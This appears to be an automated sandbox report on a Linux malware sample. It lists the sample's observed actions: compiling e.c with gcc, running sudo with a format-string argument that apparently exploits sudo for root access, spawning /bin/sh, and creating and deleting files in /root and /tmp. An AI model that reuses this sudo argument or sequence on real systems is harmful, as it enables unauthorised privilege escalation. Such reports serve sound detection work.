Technical Information
Malicious functions:
Compiles a program from source codes:
- /usr/bin/gcc e.c -o e
Launches processes:
- sh -c /usr/bin/sudo -V
- /usr/bin/sudo -V
- sh -c /usr/bin/gcc e.c -o e
- /usr/bin/sudo %20$08n %*482$ %*2850$ %1073741824$ -D9 -A
- e
- /bin/sh
Performs operations with the file system:
Modifies file access rights:
- /root/e
- /root/e.sh
Creates or modifies files:
- /root/e.c
- /tmp/ccZn0gyo.s
- /tmp/cc7lZBvC.o
- /tmp/ccxzdWlR.res
- /tmp/ccTiEiuC.c
- /tmp/ccc3dwFR.o
- /tmp/ccK5tkR6.ld
- /tmp/ccxBPv3l.le
- /root/e
- /root/e.sh
Deletes files:
- /tmp/ccK5tkR6.ld
- /tmp/ccxBPv3l.le
- /tmp/ccTiEiuC.c
- /tmp/ccc3dwFR.o
- /tmp/ccxzdWlR.res
- /tmp/cc7lZBvC.o
- /tmp/ccZn0gyo.s
- /root/e
- /root/e.c
- /root/e.sh
Other:
Collects RAM information
